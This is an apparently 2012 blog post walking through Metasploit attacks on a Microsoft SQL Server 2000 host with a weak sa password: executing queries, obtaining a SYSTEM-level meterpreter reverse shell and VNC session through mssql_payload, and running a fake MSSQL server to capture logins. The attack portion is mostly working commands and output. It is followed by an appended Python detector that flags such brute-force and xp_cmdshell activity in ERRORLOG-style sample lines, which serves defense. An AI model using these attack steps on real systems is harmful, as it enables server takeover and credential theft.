303 MSF : Attack Mssql 2
Posted on 2012-10-11 23:00:11

Running a query
msf  auxiliary(mssql_idf) > use auxiliary/admin/mssql/mssql_sql
msf  auxiliary(mssql_sql) > show options

Module options (auxiliary/admin/mssql/mssql_sql):

   Name                 Current Setting   Required  Description
   ----                 ---------------   --------  -----------
   PASSWORD                               no        The password for the specified username
   RHOST                                  yes       The target address
   RPORT                1433              yes       The target port
   SQL                  select @@version  no        The SQL query to execute
   USERNAME             sa                no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false             yes       Use windows authentification (requires DOMAIN option set)

msf  auxiliary(mssql_sql) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(mssql_sql) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  auxiliary(mssql_sql) > exploit

[*] SQL Query: select @@version
[*] Row Count: 1 (Status: 16 Command: 193)

NULL
----
Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
        May  3 2005 23:18:38
        Copyright (c) 1988-2003 Microsoft Corporation
        Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)

[*] Auxiliary module execution completed
msf  auxiliary(mssql_sql) >
Getting a shell
msf > use exploit/windows/mssql/mssql_payload
msf  exploit(mssql_payload) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(mssql_payload) > set PASSWORD 123456
PASSWORD => 123456
msf  exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(mssql_payload) > set LHOST 5.5.5.7
LHOST => 5.5.5.7
At this point the important thing is the METHOD parameter, which has three values: CMD, PS and OLD. For 2005, use OLD.
msf  exploit(mssql_payload) > set METHOD old
METHOD => old
msf  exploit(mssql_payload) > exploit

[*] Started reverse handler on 5.5.5.7:4444
[*] Warning: This module will leave jporOvxz.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 2 opened (5.5.5.7:4444 -> 5.5.5.3:1031) at 2012-09-19 23:25:13 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 3116
meterpreter >
VNC
msf  exploit(mssql_payload) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf  exploit(mssql_payload) > exploit

[*] Started reverse handler on 5.5.5.7:4444
[*] Warning: This module will leave NxdxWpkk.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (445440 bytes) to 5.5.5.3
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 3 created in the background.
msf  exploit(mssql_payload) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "fuzzexp-f60914c"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Warning: Cannot convert string "-*-helvetica-bold-r-*-*-16-*-*-*-*-*-*-*" to type FontStruct
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding


Faking the service
msf > use auxiliary/server/capture/mssql
msf  auxiliary(mssql) > exploit
[*] Auxiliary module execution completed

[*] Listening on 0.0.0.0:1433...
[*] Server started.
msf  auxiliary(mssql) >


Once someone connects:
msf  auxiliary(mssql) > [*] MSSQL LOGIN 5.5.5.3:1043 sa / <empty>
[*] MSSQL LOGIN 5.5.5.3:1044 sa / 123456


This can be done with port spoofing:
http://www.3g-sec.com/thread-309-1-2.html
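As an added defender-side example (not part of the original post), a Python script that scans SQL Server ERRORLOG-style lines for the trail this sequence leaves behind: a burst of failed 'sa' logins from one client, a following successful 'sa' login from the same client, and xp_cmdshell being switched on, which mssql_payload relies on. The log lines are constructed samples in ERRORLOG format; successful-login lines are only written when the instance audits both failed and successful logins, which is assumed here.

```python
import re
from collections import defaultdict

# Constructed sample lines in SQL Server ERRORLOG style (not real log data).
# Successful-logon lines appear only when the instance's login auditing
# level logs both failed and successful logins (assumption).
SAMPLE_ERRORLOG = """\
2012-09-19 23:24:50.01 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 5.5.5.7]
2012-09-19 23:24:51.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 5.5.5.7]
2012-09-19 23:24:52.03 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 5.5.5.7]
2012-09-19 23:25:01.44 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 5.5.5.7]
2012-09-19 23:25:05.10 spid53      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2012-09-19 23:30:00.00 Logon       Login succeeded for user 'appuser'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.12]
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<src>\S+)\s+(?P<msg>.*)$")
LOGIN_RE = re.compile(r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")
XPCMD_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")

def analyze(errorlog: str, fail_threshold: int = 3) -> list[str]:
    """Return alert strings for the pattern the post demonstrates: repeated
    failed 'sa' logins from one client, a later successful 'sa' login, and
    xp_cmdshell being enabled (which mssql_payload's upload methods need)."""
    alerts = []
    failures = defaultdict(int)  # (user, client) -> failed-login count
    for raw in errorlog.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts, msg = m.group("ts"), m.group("msg")
        login = LOGIN_RE.search(msg)
        if login:
            key = (login["user"], login["client"])
            if login["result"] == "failed":
                failures[key] += 1
                if failures[key] == fail_threshold:
                    alerts.append(f"{ts} brute-force: {failures[key]} failed logins for {key[0]} from {key[1]}")
            elif key[0] == "sa":  # any remote sa login is worth a look; flag prior failures too
                suffix = " after failed attempts" if failures[key] else ""
                alerts.append(f"{ts} sa login from {key[1]}{suffix}")
        elif XPCMD_RE.search(msg):
            alerts.append(f"{ts} xp_cmdshell enabled ({m.group('src')})")
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE_ERRORLOG):
        print(alert)
```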



